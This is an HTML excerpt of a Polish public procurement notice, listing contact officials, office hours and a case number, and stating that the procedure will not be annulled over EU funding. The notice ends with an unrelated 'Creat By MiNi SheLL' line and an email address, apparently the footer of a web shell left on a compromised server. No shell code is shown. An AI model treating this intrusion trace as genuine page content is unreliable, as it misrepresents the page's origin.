<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osoby uprawnione do porozumiewania się z Wykonawcami w zakresie ogólnym nie mającym charakteru oświadczeń woli w imieniu Zamawiającego (wyjaśnianie siwz) w rozumieniu art. 38 ust.1 upzp: 1) Dariusz Cios - Centrum Zamówień Publicznych tel. (84) 688 12 02, Biłgoraj, ul. Kościuszki 103; 2) Monika Bednarz - Centrum Zamówień Publicznych tel. (84) 688 12 12, Biłgoraj, ul. Kościuszki 103. 2. Osoby o których mowa powyżej udzielają informacji w godz. 8:00 do 14:00 w dni robocze z wyjątkiem sobót i dni ustawowo wolnych od pracy. Numer postępowania nadany sprawie przez Zamawiajacego 030000/271/3/2016-CZP.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com